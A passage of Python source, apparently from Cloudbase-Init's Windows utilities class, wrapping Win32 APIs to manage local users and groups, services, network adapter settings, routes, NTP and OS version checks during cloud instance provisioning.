0x00, 0xa0, 0xc9, 0x1e, 0xfb, 0x8b)
class WindowsUtils(base.BaseOSUtils):
NERR_GroupNotFound = 2220
NERR_UserNotFound = 2221
ERROR_PATH_NOT_FOUND = 3
ERROR_ACCESS_DENIED = 5
ERROR_INSUFFICIENT_BUFFER = 122
ERROR_INVALID_NAME = 123
ERROR_NO_DATA = 232
ERROR_MORE_DATA = 234
ERROR_NO_SUCH_MEMBER = 1387
ERROR_MEMBER_IN_ALIAS = 1378
ERROR_INVALID_MEMBER = 1388
ERROR_NO_MORE_FILES = 18
STATUS_REVISION_MISMATCH = 0xC0000059
ADS_UF_PASSWORD_EXPIRED = 0x800000
PASSWORD_CHANGED_FLAG = 1
INVALID_HANDLE_VALUE = 0xFFFFFFFF
FILE_SHARE_READ = 1
FILE_SHARE_WRITE = 2
OPEN_EXISTING = 3
IOCTL_STORAGE_GET_DEVICE_NUMBER = 0x002D1080
MAX_PATH = 260
DIGCF_PRESENT = 2
DIGCF_DEVICEINTERFACE = 0x10
DRIVE_CDROM = 5
INFINITE = 0xFFFFFFFF
CREATE_NEW_CONSOLE = 0x10
LOGON32_LOGON_BATCH = 4
LOGON32_LOGON_INTERACTIVE = 2
LOGON32_LOGON_SERVICE = 5
LOGON32_PROVIDER_DEFAULT = 0
EXTENDED_NAME_FORMAT_SAM_COMPATIBLE = 2
SERVICE_STATUS_STOPPED = "Stopped"
SERVICE_STATUS_START_PENDING = "Start Pending"
SERVICE_STATUS_STOP_PENDING = "Stop Pending"
SERVICE_STATUS_RUNNING = "Running"
SERVICE_STATUS_CONTINUE_PENDING = "Continue Pending"
SERVICE_STATUS_PAUSE_PENDING = "Pause Pending"
SERVICE_STATUS_PAUSED = "Paused"
SERVICE_STATUS_UNKNOWN = "Unknown"
SERVICE_START_MODE_AUTOMATIC = "Automatic"
SERVICE_START_MODE_MANUAL = "Manual"
SERVICE_START_MODE_DISABLED = "Disabled"
_SERVICE_START_TYPE_MAP = {
SERVICE_START_MODE_AUTOMATIC:
win32service.SERVICE_AUTO_START,
SERVICE_START_MODE_MANUAL:
win32service.SERVICE_DEMAND_START,
SERVICE_START_MODE_DISABLED:
win32service.SERVICE_DISABLED}
_SERVICE_STATUS_MAP = {
win32service.SERVICE_CONTINUE_PENDING:
SERVICE_STATUS_CONTINUE_PENDING,
win32service.SERVICE_PAUSE_PENDING:
SERVICE_STATUS_PAUSE_PENDING,
win32service.SERVICE_PAUSED:
SERVICE_STATUS_PAUSED,
win32service.SERVICE_RUNNING:
SERVICE_STATUS_RUNNING,
win32service.SERVICE_START_PENDING:
SERVICE_STATUS_START_PENDING,
win32service.SERVICE_STOP_PENDING:
SERVICE_STATUS_STOP_PENDING,
win32service.SERVICE_STOPPED:
SERVICE_STATUS_STOPPED,
}
ComputerNamePhysicalDnsHostname = 5
_config_key = 'SOFTWARE\\Cloudbase Solutions\\Cloudbase-Init\\'
_service_name = 'cloudbase-init'
_FW_IP_PROTOCOL_TCP = 6
_FW_IP_PROTOCOL_UDP = 17
_FW_SCOPE_ALL = 0
_FW_SCOPE_LOCAL_SUBNET = 1
VER_NT_WORKSTATION = 1
def __init__(self):
self._network_team_manager = None
def reboot(self):
with privilege.acquire_privilege(win32security.SE_SHUTDOWN_NAME):
ret_val = advapi32.InitiateSystemShutdownExW(
0, "Cloudbase-Init reboot",
0, True, True, 0)
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Reboot failed: %r")
def user_exists(self, username):
try:
self._get_user_info(username, 1)
return True
except exception.ItemNotFoundException:
# User not found
return False
def create_user(self, username, password, password_expires=False):
user_info = {
"name": username,
"password": password,
"priv": win32netcon.USER_PRIV_USER,
"flags": win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT,
}
if not password_expires:
user_info["flags"] |= win32netcon.UF_DONT_EXPIRE_PASSWD
try:
win32net.NetUserAdd(None, 1, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Create user failed: %s" % ex.args[2])
def rename_user(self, username, new_username):
user_info = {
"name": new_username,
}
try:
win32net.NetUserSetInfo(None, username, 0, user_info)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
raise exception.CloudbaseInitException(
"Renaming user failed: %s" % ex.args[2])
def set_user_info(self, username, full_name=None,
disabled=False, expire_interval=None):
user_info = self._get_user_info(username, 2)
if full_name:
user_info["full_name"] = full_name
if disabled:
user_info["flags"] |= win32netcon.UF_ACCOUNTDISABLE
else:
user_info["flags"] &= ~win32netcon.UF_ACCOUNTDISABLE
if expire_interval is not None:
user_info["acct_expires"] = int(expire_interval)
else:
user_info["acct_expires"] = win32netcon.TIMEQ_FOREVER
try:
win32net.NetUserSetInfo(None, username, 2, user_info)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
LOG.debug(ex)
raise exception.CloudbaseInitException(
"Setting user info failed: %s" % ex.args[2])
def enum_users(self):
usernames = []
resume_handle = 0
while True:
try:
users_info, total, resume_handle = win32net.NetUserEnum(
None, 0, win32netcon.FILTER_NORMAL_ACCOUNT, resume_handle)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Enumerating users failed: %s" % ex.args[2])
usernames += [u["name"] for u in users_info]
if not resume_handle:
return usernames
def is_builtin_admin(self, username):
sid = self.get_user_sid(username)
return sid and sid.startswith(u"S-1-5-") and sid.endswith(u"-500")
def _get_user_info(self, username, level):
try:
return win32net.NetUserGetInfo(None, username, level)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
raise exception.CloudbaseInitException(
"Failed to get user info: %s" % ex.args[2])
def set_user_password(self, username, password, password_expires=False):
user_info = self._get_user_info(username, 1)
user_info["password"] = password
if password_expires:
user_info["flags"] &= ~win32netcon.UF_DONT_EXPIRE_PASSWD
else:
user_info["flags"] |= win32netcon.UF_DONT_EXPIRE_PASSWD
try:
win32net.NetUserSetInfo(None, username, 1, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Set user password failed: %s" % ex.args[2])
def change_password_next_logon(self, username):
"""Force the given user to change the password at next logon."""
user_info = self._get_user_info(username, 4)
user_info["flags"] &= ~win32netcon.UF_DONT_EXPIRE_PASSWD
user_info["password_expired"] = 1
try:
win32net.NetUserSetInfo(None, username, 4, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Setting password expiration failed: %s" % ex.args[2])
def group_exists(self, group):
try:
self._get_group_info(group, 1)
return True
except exception.ItemNotFoundException:
# Group not found
return False
def _get_group_info(self, group, level):
try:
return win32net.NetLocalGroupGetInfo(None, group, level)
except win32net.error as ex:
if ex.args[0] == self.NERR_GroupNotFound:
raise exception.ItemNotFoundException(
"Group not found: %s" % group)
else:
raise exception.CloudbaseInitException(
"Failed to get group info: %s" % ex.args[2])
def create_group(self, group, description=None):
group_info = {"name": group}
try:
win32net.NetLocalGroupAdd(None, 0, group_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Create group failed: %s" % ex.args[2])
@staticmethod
def _get_cch_referenced_domain_name(domain_name):
return wintypes.DWORD(
ctypes.sizeof(domain_name) // ctypes.sizeof(wintypes.WCHAR))
def _get_user_sid_and_domain(self, username):
sid = ctypes.create_string_buffer(1024)
cbSid = wintypes.DWORD(ctypes.sizeof(sid))
domainName = ctypes.create_unicode_buffer(1024)
cchReferencedDomainName = self._get_cch_referenced_domain_name(
domainName)
sidNameUse = wintypes.DWORD()
ret_val = advapi32.LookupAccountNameW(
0, six.text_type(username), sid, ctypes.byref(cbSid), domainName,
ctypes.byref(cchReferencedDomainName), ctypes.byref(sidNameUse))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Cannot get user SID: %r")
return sid, domainName.value
def add_user_to_local_group(self, username, groupname):
lmi = Win32_LOCALGROUP_MEMBERS_INFO_3()
lmi.lgrmi3_domainandname = six.text_type(username)
ret_val = netapi32.NetLocalGroupAddMembers(0, six.text_type(groupname),
3, ctypes.pointer(lmi), 1)
if ret_val == self.NERR_GroupNotFound:
raise exception.CloudbaseInitException("Group '%s' not found"
% groupname)
elif ret_val == self.ERROR_ACCESS_DENIED:
raise exception.CloudbaseInitException('Access denied')
elif ret_val == self.ERROR_NO_SUCH_MEMBER:
raise exception.CloudbaseInitException("Username '%s' not found"
% username)
elif ret_val == self.ERROR_MEMBER_IN_ALIAS:
# The user is already a member of the group
pass
elif ret_val == self.ERROR_INVALID_MEMBER:
raise exception.CloudbaseInitException('Invalid user')
elif ret_val != 0:
raise exception.CloudbaseInitException('Unknown error')
def get_user_sid(self, username):
try:
user_info = self._get_user_info(username, 4)
return str(user_info["user_sid"])[6:]
except exception.ItemNotFoundException:
# User not found
pass
def create_user_logon_session(self, username, password, domain='.',
load_profile=True,
logon_type=LOGON32_LOGON_INTERACTIVE):
LOG.debug("Creating logon session for user: %(domain)s\\%(username)s",
{"username": username, "domain": domain})
token = wintypes.HANDLE()
ret_val = advapi32.LogonUserW(six.text_type(username),
six.text_type(domain),
six.text_type(password),
logon_type,
self.LOGON32_PROVIDER_DEFAULT,
ctypes.byref(token))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"User logon failed: %r")
if load_profile:
pi = Win32_PROFILEINFO()
pi.dwSize = ctypes.sizeof(Win32_PROFILEINFO)
pi.lpUserName = six.text_type(username)
ret_val = userenv.LoadUserProfileW(token, ctypes.byref(pi))
if not ret_val:
kernel32.CloseHandle(token)
raise exception.WindowsCloudbaseInitException(
"Cannot load user profile: %r")
return token
def get_current_user(self):
"""Get the user account name from the underlying instance."""
buf_len = wintypes.ULONG(512)
buf = ctypes.create_unicode_buffer(512)
ret_val = secur32.GetUserNameExW(
self.EXTENDED_NAME_FORMAT_SAM_COMPATIBLE,
buf, ctypes.byref(buf_len))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"GetUserNameExW failed: %r")
return buf.value.split("\\")
def execute_process_as_user(self, token, args, wait=True,
new_console=False):
"""Executes processes as an user.
:param token: Represents the user logon session token, resulted from
running the 'create_user_logon_session' method.
:param args: The arguments with which the process will be run with.
:param wait: Specifies if it's needed to wait for the process
handler to finish up running all the operations
on the process object.
:param new_console: Specifies whether the process should run
under a new console or not.
:return: The exit code value resulted from the running process.
:rtype: int
"""
LOG.debug("Executing process as user, command line: %s", args)
proc_info = Win32_PROCESS_INFORMATION()
startup_info = Win32_STARTUPINFO_W()
startup_info.cb = ctypes.sizeof(Win32_STARTUPINFO_W)
startup_info.lpDesktop = ""
flags = self.CREATE_NEW_CONSOLE if new_console else 0
cmdline = ctypes.create_unicode_buffer(subprocess.list2cmdline(args))
try:
ret_val = advapi32.CreateProcessAsUserW(
token, None, cmdline, None, None, False, flags, None, None,
ctypes.byref(startup_info), ctypes.byref(proc_info))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"CreateProcessAsUserW failed: %r")
if wait and proc_info.hProcess:
kernel32.WaitForSingleObject(
proc_info.hProcess, self.INFINITE)
exit_code = wintypes.DWORD()
if not kernel32.GetExitCodeProcess(
proc_info.hProcess, ctypes.byref(exit_code)):
raise exception.WindowsCloudbaseInitException(
"GetExitCodeProcess failed: %r")
return exit_code.value
finally:
if proc_info.hProcess:
kernel32.CloseHandle(proc_info.hProcess)
if proc_info.hThread:
kernel32.CloseHandle(proc_info.hThread)
def close_user_logon_session(self, token):
kernel32.CloseHandle(token)
def get_user_home(self, username):
user_sid = self.get_user_sid(username)
if user_sid:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SOFTWARE\\'
'Microsoft\\Windows NT\\CurrentVersion\\'
'ProfileList\\%s' % user_sid) as key:
return winreg.QueryValueEx(key, 'ProfileImagePath')[0]
LOG.debug('Home directory not found for user %r', username)
return None
def sanitize_shell_input(self, value):
return value.replace('"', '\\"')
def set_host_name(self, new_host_name):
ret_val = kernel32.SetComputerNameExW(
self.ComputerNamePhysicalDnsHostname,
six.text_type(new_host_name))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Cannot set host name: %r")
return True
def get_network_adapters(self):
"""Return available adapters as a list of tuples of (name, mac)."""
conn = wmi.WMI(moniker='//./root/cimv2')
# Get Ethernet adapters only
wql = ('SELECT * FROM Win32_NetworkAdapter WHERE '
'AdapterTypeId = 0 AND MACAddress IS NOT NULL')
if self.check_os_version(6, 0):
wql += ' AND PhysicalAdapter = True'
q = conn.query(wql)
return [(r.NetConnectionID, r.MACAddress) for r in q]
def get_dhcp_hosts_in_use(self):
dhcp_hosts = []
for net_addr in network.get_adapter_addresses():
if net_addr["dhcp_enabled"] and net_addr["dhcp_server"]:
dhcp_hosts.append((net_addr["friendly_name"],
net_addr["mac_address"],
net_addr["dhcp_server"]))
return dhcp_hosts
def set_ntp_client_config(self, ntp_hosts):
base_dir = self._get_system_dir()
w32tm_path = os.path.join(base_dir, "w32tm.exe")
# Convert the NTP hosts list to a string, in order to pass
# it to w32tm.
ntp_hosts = ",".join(ntp_hosts)
args = [w32tm_path, '/config', '/manualpeerlist:%s' % ntp_hosts,
'/syncfromflags:manual', '/update']
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'w32tm failed to configure NTP.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
@retry_decorator.retry_decorator(
max_retry_count=30, exceptions=exception.ItemNotFoundException)
def get_network_adapter_name_by_mac_address(self, mac_address):
iface_index_list = [
net_addr for net_addr
in network.get_adapter_addresses()
if net_addr["mac_address"] is not None and
net_addr["mac_address"].lower() == mac_address.lower()]
if not iface_index_list:
raise exception.ItemNotFoundException(
'Network interface with MAC address "%s" not found' %
mac_address)
if len(iface_index_list) > 1:
raise exception.CloudbaseInitException(
'Multiple network interfaces with MAC address "%s" exist' %
mac_address)
return iface_index_list[0]["friendly_name"]
@retry_decorator.retry_decorator(
max_retry_count=3, exceptions=exception.ItemNotFoundException)
def set_network_adapter_mtu(self, name, mtu):
if not self.check_os_version(6, 0):
raise exception.CloudbaseInitException(
'Setting the MTU is currently not supported on Windows XP '
'and Windows Server 2003')
iface_index_list = [
net_addr["interface_index"] for net_addr
in network.get_adapter_addresses()
if net_addr["friendly_name"] == name]
if not iface_index_list:
raise exception.ItemNotFoundException(
'Network interface with name "%s" not found' %
name)
else:
iface_index = iface_index_list[0]
LOG.debug('Setting MTU for interface "%(name)s" with '
'value "%(mtu)s"',
{'name': name, 'mtu': mtu})
base_dir = self._get_system_dir()
netsh_path = os.path.join(base_dir, 'netsh.exe')
args = [netsh_path, "interface", "ipv4", "set", "subinterface",
str(iface_index), "mtu=%s" % mtu,
"store=persistent"]
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'Setting MTU for interface "%(name)s" with '
'value "%(mtu)s" failed' % {'name': name, 'mtu': mtu})
def rename_network_adapter(self, old_name, new_name):
base_dir = self._get_system_dir()
netsh_path = os.path.join(base_dir, 'netsh.exe')
args = [netsh_path, "interface", "set", "interface",
'name=%s' % old_name, 'newname=%s' % new_name]
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'Renaming interface "%(old_name)s" to "%(new_name)s" '
'failed' % {'old_name': old_name, 'new_name': new_name})
@staticmethod
def _get_network_adapter(name):
conn = wmi.WMI(moniker='//./root/cimv2')
query = conn.Win32_NetworkAdapter(NetConnectionID=name)
if not len(query):
raise exception.CloudbaseInitException(
"Network adapter not found: %s" % name)
return query[0]
@staticmethod
def _set_static_network_config_legacy(name, address, netmask, gateway,
dnsnameservers):
if netaddr.valid_ipv6(address):
LOG.warning("Setting IPv6 info not available on this system")
return
adapter_config = WindowsUtils._get_network_adapter(name).associators(
wmi_result_class='Win32_NetworkAdapterConfiguration')[0]
LOG.debug("Setting static IP address")
(ret_val,) = adapter_config.EnableStatic([address], [netmask])
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set static IP address on network adapter: %d" %
ret_val)
reboot_required = (ret_val == 1)
if gateway:
LOG.debug("Setting static gateways")
(ret_val,) = adapter_config.SetGateways([gateway], [1])
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set gateway on network adapter: %d" % ret_val)
reboot_required = reboot_required or ret_val == 1
if dnsnameservers:
LOG.debug("Setting static DNS servers")
(ret_val,) = adapter_config.SetDNSServerSearchOrder(dnsnameservers)
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set DNS on network adapter: %d" % ret_val)
reboot_required = reboot_required or ret_val == 1
return reboot_required
@staticmethod
def _fix_network_adapter_dhcp(interface_name, enable_dhcp, address_family):
interface_id = WindowsUtils._get_network_adapter(interface_name).GUID
tcpip_key = "Tcpip6" if address_family == AF_INET6 else "Tcpip"
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\services\\%(tcpip_key)s\\"
"Parameters\\Interfaces\\%(interface_id)s" %
{"tcpip_key": tcpip_key, "interface_id": interface_id},
0, winreg.KEY_SET_VALUE) as key:
winreg.SetValueEx(
key, 'EnableDHCP', 0, winreg.REG_DWORD,
1 if enable_dhcp else 0)
@staticmethod
def _set_interface_dns(interface_name, dnsnameservers):
# Import here to avoid loading errors on Windows versions where MI is
# not available
import mi
conn = wmi.WMI(moniker='//./root/standardcimv2')
# Requires Windows >= 6.2
dns_client = conn.MSFT_DnsClientServerAddress(
InterfaceAlias=interface_name)
if not len(dns_client):
raise exception.ItemNotFoundException(
'Network interface with name "%s" not found' %
interface_name)
dns_client = dns_client[0]
custom_options = [{
u'name': u'ServerAddresses',
u'value_type': mi.MI_ARRAY | mi.MI_STRING,
u'value': dnsnameservers
}]
operation_options = {u'custom_options': custom_options}
dns_client.put(operation_options=operation_options)
def enable_network_adapter(self, name, enabled):
adapter = self._get_network_adapter(name)
if enabled:
adapter.Enable()
else:
adapter.Disable()
@staticmethod
def _set_static_network_config(name, address, prefix_len, gateway):
if netaddr.valid_ipv6(address):
family = AF_INET6
else:
family = AF_INET
# This is needed to avoid the error:
# "Inconsistent parameters PolicyStore PersistentStore and
# Dhcp Enabled"
WindowsUtils._fix_network_adapter_dhcp(name, False, family)
conn = wmi.WMI(moniker='//./root/standardcimv2')
existing_addresses = conn.MSFT_NetIPAddress(
AddressFamily=family, InterfaceAlias=name)
for existing_address in existing_addresses:
LOG.debug(
"Removing existing IP address \"%(ip)s\" "
"from adapter \"%(name)s\"",
{"ip": existing_address.IPAddress, "name": name})
existing_address.Delete_()
existing_routes = conn.MSFT_NetRoute(
AddressFamily=family, InterfaceAlias=name)
for existing_route in existing_routes:
LOG.debug(
"Removing existing route \"%(route)s\" "
"from adapter \"%(name)s\"",
{"route": existing_route.DestinationPrefix, "name": name})
existing_route.Delete_()
conn.MSFT_NetIPAddress.create(
AddressFamily=family, InterfaceAlias=name, IPAddress=address,
PrefixLength=prefix_len, DefaultGateway=gateway)
def set_static_network_config(self, name, address, prefix_len_or_netmask,
gateway, dnsnameservers):
ip_network = netaddr.IPNetwork(
u"%s/%s" % (address, prefix_len_or_netmask))
prefix_len = ip_network.prefixlen
netmask = str(ip_network.netmask)
if self.check_os_version(6, 2):
self._set_static_network_config(
name, address, prefix_len, gateway)
if len(dnsnameservers):
self._set_interface_dns(name, dnsnameservers)
else:
return self._set_static_network_config_legacy(
name, address, netmask, gateway, dnsnameservers)
def _get_network_team_manager(self):
if self._network_team_manager:
return self._network_team_manager
team_managers = [
"cloudbaseinit.utils.windows.netlbfo.NetLBFOTeamManager",
]
cl = classloader.ClassLoader()
for class_name in team_managers:
try:
cls = cl.load_class(class_name)
if cls.is_available():
self._network_team_manager = cls()
return self._network_team_manager
except Exception as ex:
LOG.exception(ex)
raise exception.ItemNotFoundException(
"No network team manager available")
def create_network_team(self, team_name, mode, load_balancing_algorithm,
members, mac_address, primary_nic_name=None,
primary_nic_vlan_id=None, lacp_timer=None):
self._get_network_team_manager().create_team(
team_name, mode, load_balancing_algorithm, members, mac_address,
primary_nic_name, primary_nic_vlan_id, lacp_timer)
def add_network_team_nic(self, team_name, nic_name, vlan_id):
self._get_network_team_manager().add_team_nic(
team_name, nic_name, vlan_id)
def _get_config_key_name(self, section):
key_name = self._config_key
if section:
key_name += section.replace('/', '\\') + '\\'
return key_name
def set_config_value(self, name, value, section=None):
key_name = self._get_config_key_name(section)
with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
key_name) as key:
if type(value) == int:
regtype = winreg.REG_DWORD
else:
regtype = winreg.REG_SZ
winreg.SetValueEx(key, name, 0, regtype, value)
def get_config_value(self, name, section=None):
key_name = self._get_config_key_name(section)
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
key_name) as key:
(value, regtype) = winreg.QueryValueEx(key, name)
return value
except WindowsError:
return None
def wait_for_boot_completion(self):
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
"SYSTEM\\Setup\\Status\\SysprepStatus", 0,
winreg.KEY_READ) as key:
while True:
gen_state = winreg.QueryValueEx(key,
"GeneralizationState")[0]
if gen_state == 7:
break
time.sleep(1)
LOG.info('Waiting for sysprep completion. '
'GeneralizationState: %d', gen_state)
except WindowsError as ex:
if ex.winerror == 2:
LOG.debug('Sysprep data not found in the registry, '
'skipping sysprep completion check.')
else:
raise ex
def check_service_exists(self, service_name):
LOG.debug("Checking if service exists: %s", service_name)
try:
with self._get_service_handle(service_name):
return True
except pywintypes.error as ex:
if ex.winerror == winerror.ERROR_SERVICE_DOES_NOT_EXIST:
return False
raise
def get_service_status(self, service_name):
LOG.debug("Getting service status for: %s", service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_QUERY_STATUS) as hs:
service_status = win32service.QueryServiceStatusEx(hs)
state = service_status['CurrentState']
return self._SERVICE_STATUS_MAP.get(
state, WindowsUtils.SERVICE_STATUS_UNKNOWN)
def get_service_start_mode(self, service_name):
LOG.debug("Getting service start mode for: %s", service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_QUERY_CONFIG) as hs:
service_config = win32service.QueryServiceConfig(hs)
start_type = service_config[1]
return [k for k, v in self._SERVICE_START_TYPE_MAP.items()
if v == start_type][0]
def set_service_start_mode(self, service_name, start_mode):
# TODO(alexpilotti): Handle the "Delayed Start" case
LOG.debug("Setting service start mode for: %s", service_name)
start_type = self._get_win32_start_type(start_mode)
with self._get_service_handle(
service_name, win32service.SERVICE_CHANGE_CONFIG) as hs:
win32service.ChangeServiceConfig(
hs, win32service.SERVICE_NO_CHANGE,
start_type, win32service.SERVICE_NO_CHANGE,
None, None, False, None, None, None, None)
def start_service(self, service_name):
LOG.debug('Starting service %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_START) as hs:
win32service.StartService(hs, service_name)
def stop_service(self, service_name, wait=False):
LOG.debug('Stopping service %s', service_name)
with self._get_service_handle(
service_name,
win32service.SERVICE_STOP |
win32service.SERVICE_QUERY_STATUS) as hs:
win32service.ControlService(hs, win32service.SERVICE_CONTROL_STOP)
if wait:
while True:
service_status = win32service.QueryServiceStatusEx(hs)
state = service_status['CurrentState']
if state == win32service.SERVICE_STOPPED:
return
time.sleep(.1)
@staticmethod
@contextlib.contextmanager
def _get_service_control_manager(
scm_access=win32service.SC_MANAGER_CONNECT):
hscm = win32service.OpenSCManager(None, None, scm_access)
try:
yield hscm
finally:
win32service.CloseServiceHandle(hscm)
@staticmethod
@contextlib.contextmanager
def _get_service_handle(service_name,
service_access=win32service.SERVICE_QUERY_CONFIG,
scm_access=win32service.SC_MANAGER_CONNECT):
with WindowsUtils._get_service_control_manager(scm_access) as hscm:
hs = win32service.OpenService(hscm, service_name, service_access)
try:
yield hs
finally:
win32service.CloseServiceHandle(hs)
@staticmethod
def _get_win32_start_type(start_mode):
start_type = WindowsUtils._SERVICE_START_TYPE_MAP.get(start_mode)
if not start_type:
raise exception.InvalidStateException(
"Invalid service start mode: %s" % start_mode)
return start_type
def create_service(self, service_name, display_name, path, start_mode,
username=None, password=None):
LOG.debug('Creating service %s', service_name)
start_type = self._get_win32_start_type(start_mode)
with WindowsUtils._get_service_control_manager(
scm_access=win32service.SC_MANAGER_CREATE_SERVICE) as hscm:
hs = win32service.CreateService(
hscm, service_name, display_name,
win32service.SERVICE_ALL_ACCESS,
win32service.SERVICE_WIN32_OWN_PROCESS,
start_type,
win32service.SERVICE_ERROR_NORMAL,
path, None, False, None,
username, password)
win32service.CloseServiceHandle(hs)
def delete_service(self, service_name):
LOG.debug('Deleting service %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_ALL_ACCESS) as hs:
win32service.DeleteService(hs)
def set_service_credentials(self, service_name, username, password):
LOG.debug('Setting service credentials: %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_CHANGE_CONFIG) as hs:
win32service.ChangeServiceConfig(
hs,
win32service.SERVICE_NO_CHANGE,
win32service.SERVICE_NO_CHANGE,
win32service.SERVICE_NO_CHANGE,
None,
None,
False,
None,
username,
password,
None)
def get_service_username(self, service_name):
LOG.debug('Getting service username: %s', service_name)
with self._get_service_handle(service_name) as hs:
cfg = win32service.QueryServiceConfig(hs)
return cfg[7]
def reset_service_password(self):
"""This is needed to avoid pass the hash attacks."""
if not self.check_service_exists(self._service_name):
LOG.info("Service does not exist: %s", self._service_name)
return None
service_username = self.get_service_username(self._service_name)
# Ignore builtin accounts
if "\\" not in service_username:
LOG.info("Skipping password reset, service running as a built-in "
"account: %s", service_username)
return None
domain, username = service_username.split('\\')
if domain != ".":
LOG.info("Skipping password reset, service running as a domain "
"account: %s", service_username)
return None
LOG.debug('Resetting password for service user: %s', service_username)
maximum_length = self.get_maximum_password_length()
password = self.generate_random_password(maximum_length)
self.set_user_password(username, password)
self.set_service_credentials(
self._service_name, service_username, password)
return domain, username, password
def terminate(self):
# Wait for the service to start. Polling the service "Started" property
# is not enough
time.sleep(3)
self.stop_service(self._service_name)
def get_default_gateway(self):
default_routes = [r for r in self._get_ipv4_routing_table()
if r[0] == '0.0.0.0']
if default_routes:
return default_routes[0][3], default_routes[0][2]
else:
return None, None
@staticmethod
def _heap_alloc(heap, size):
table_mem = kernel32.HeapAlloc(heap, 0, ctypes.c_size_t(size.value))
if not table_mem:
raise exception.CloudbaseInitException(
'Unable to allocate memory for the IP forward table')
return table_mem
@contextlib.contextmanager
def _get_forward_table(self):
heap = kernel32.GetProcessHeap()
forward_table_size = ctypes.sizeof(Win32_MIB_IPFORWARDTABLE)
size = wintypes.ULONG(forward_table_size)
table_mem = self._heap_alloc(heap, size)
p_forward_table = ctypes.cast(
table_mem, ctypes.POINTER(Win32_MIB_IPFORWARDTABLE))
try:
err = iphlpapi.GetIpForwardTable(p_forward_table,
ctypes.byref(size), 0)
if err == self.ERROR_INSUFFICIENT_BUFFER:
kernel32.HeapFree(heap, 0, p_forward_table)
table_mem = self._heap_alloc(heap, size)
p_forward_table = ctypes.cast(
table_mem,
ctypes.POINTER(Win32_MIB_IPFORWARDTABLE))
err = iphlpapi.GetIpForwardTable(p_forward_table,
ctypes.byref(size), 0)
if err and err != kernel32.ERROR_NO_DATA:
raise exception.CloudbaseInitException(
'Unable to get IP forward table. Error: %s' % err)
yield p_forward_table
finally:
kernel32.HeapFree(heap, 0, p_forward_table)
def _get_ipv4_routing_table(self):
routing_table = []
with self._get_forward_table() as p_forward_table:
forward_table = p_forward_table.contents
table = ctypes.cast(
ctypes.addressof(forward_table.table),
ctypes.POINTER(Win32_MIB_IPFORWARDROW *
forward_table.dwNumEntries)).contents
for row in table:
destination = Ws2_32.inet_ntoa(
row.dwForwardDest).decode()
netmask = Ws2_32.inet_ntoa(
row.dwForwardMask).decode()
gateway = Ws2_32.inet_ntoa(
row.dwForwardNextHop).decode()
routing_table.append((
destination,
netmask,
gateway,
row.dwForwardIfIndex,
row.dwForwardMetric1))
return routing_table
def check_static_route_exists(self, destination):
return len([r for r in self._get_ipv4_routing_table()
if r[0] == destination]) > 0
def add_static_route(self, destination, mask, next_hop, interface_index,
metric):
args = ['ROUTE', 'ADD', destination, 'MASK', mask, next_hop]
(out, err, ret_val) = self.execute_process(args)
# Cannot use the return value to determine the outcome
if ret_val or err:
raise exception.CloudbaseInitException(
'Unable to add route: %s' % err)
def get_os_version(self):
vi = Win32_OSVERSIONINFOEX_W()
vi.dwOSVersionInfoSize = ctypes.sizeof(Win32_OSVERSIONINFOEX_W)
ret_val = ntdll.RtlGetVersion(ctypes.byref(vi))
if ret_val:
raise exception.WindowsCloudbaseInitException(
"RtlGetVersion failed with error: %s" % ret_val)
return {"major_version": vi.dwMajorVersion,
"minor_version": vi.dwMinorVersion,
"build_number": vi.dwBuildNumber,
"platform_id": vi.dwPlatformId,
"csd_version": vi.szCSDVersion,
"service_pack_major": vi.wServicePackMajor,
"service_pack_minor": vi.wServicePackMinor,
"suite_mask": vi.wSuiteMask,
"product_type": vi.wProductType}
def is_client_os(self):
return self.get_os_version()["product_type"] == self.VER_NT_WORKSTATION
def check_os_version(self, major, minor, build=0):
vi = Win32_OSVERSIONINFOEX_W()
vi.dwOSVersionInfoSize = ctypes.sizeof(Win32_OSVERSIONINFOEX_W)
vi.dwMajorVersion = major
vi.dwMinorVersion = minor
vi.dwBuildNumber = build
mask = 0
for type_mask in [VER_MAJORVERSION, VER_MINORVERSION, VER_BUILDNUMBER]:
mask = kernel32.VerSetConditionMask(mask, type_mask,
VER_GREATER_EQUAL)
type_mask = VER_MAJORVERSION | VER_MINORVERSION | VER_BUILDNUMBER
ret_val = ntdll.RtlVerifyVersionInfo(ctypes.byref(vi), type_mask, mask)
if not ret_val:
return True
elif ret_val == self.STATUS_REVISION_MISMATCH:
return False
else:
